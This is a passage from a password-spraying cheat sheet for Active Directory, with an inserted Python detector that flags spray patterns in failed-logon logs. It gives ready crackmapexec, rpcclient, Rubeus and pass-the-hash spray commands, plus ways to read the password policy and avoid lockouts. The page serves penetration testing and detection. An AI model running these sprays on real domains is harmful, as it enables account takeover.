Once you have found several valid usernames, you can try the most common passwords (keep the environment's password policy in mind) against each of the discovered users.
By default the minimum password length is 7.
Note that you can lock out some accounts if you try too many wrong passwords (by default more than 10).
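The pattern described above (a few common passwords tried against each of many accounts, staying under the lockout threshold) shows up in failed-logon logs as one source failing against many distinct accounts in a short time. The following detection example is added here and is not part of the original page; the record layout, the sample data and the thresholds are assumptions:

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed failed-logon records: (timestamp, source address, target account).
# The field layout is an assumption; map it from your own log source
# (for example Windows Security event 4625).
USERS = ["alice", "bob", "carol", "dave", "erin", "frank"]
SAMPLE_FAILURES = (
    # one source, six accounts, one attempt each within seconds
    [(f"2024-05-01T09:00:{i:02d}", "10.0.5.23", u) for i, u in enumerate(USERS)]
    # one user mistyping their own password four times
    + [(f"2024-05-01T09:05:{i:02d}", "10.0.7.40", "alice") for i in range(4)]
    # five accounts from one source, but one hour apart
    + [(f"2024-05-01T{h:02d}:00:00", "10.0.9.9", u)
       for h, u in zip(range(10, 15), ["gina", "hal", "ian", "jo", "kim"])]
)


def detect_spray(failures, window=timedelta(minutes=30), min_users=5, max_per_user=2):
    """Return {source: [accounts]} for sources that fail against at least
    `min_users` distinct accounts inside `window` while making no more than
    `max_per_user` attempts on any single account."""
    by_source = defaultdict(list)
    for ts, src, user in failures:
        by_source[src].append((datetime.fromisoformat(ts), user.lower()))

    alerts = {}
    for src, events in by_source.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # shrink the sliding window until it spans at most `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            counts = defaultdict(int)
            for _, user in events[start:end + 1]:
                counts[user] += 1
            if len(counts) >= min_users and max(counts.values()) <= max_per_user:
                # keep the widest set of accounts seen for this source
                if len(counts) > len(alerts.get(src, [])):
                    alerts[src] = sorted(counts)
    return alerts


if __name__ == "__main__":
    for source, accounts in detect_spray(SAMPLE_FAILURES).items():
        print(f"possible spray from {source}: {len(accounts)} accounts {accounts}")
```

Size `window` and `min_users` against the domain's own lockout policy; a longer window also catches attempts spaced far apart, at the cost of more noise from shared NAT or proxy addresses.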
Get password policy
If you have some user credentials or a shell as a domain user, you can get the password policy with:
# From Linux
crackmapexec smb <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" # From PowerView
Using crackmapexec:
crackmapexec smb <IP> -u users.txt -p passwords.txt

# Local Auth Spray (once you found some local admin pass or hash)
## The --local-auth flag indicates to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
With Metasploit's scanner/smb/smb_login module:
Using rpcclient:
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
    rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
With Invoke-DomainPasswordSpray (by default it can generate the user list from the domain, and it reads the password policy from the domain and limits its attempts accordingly):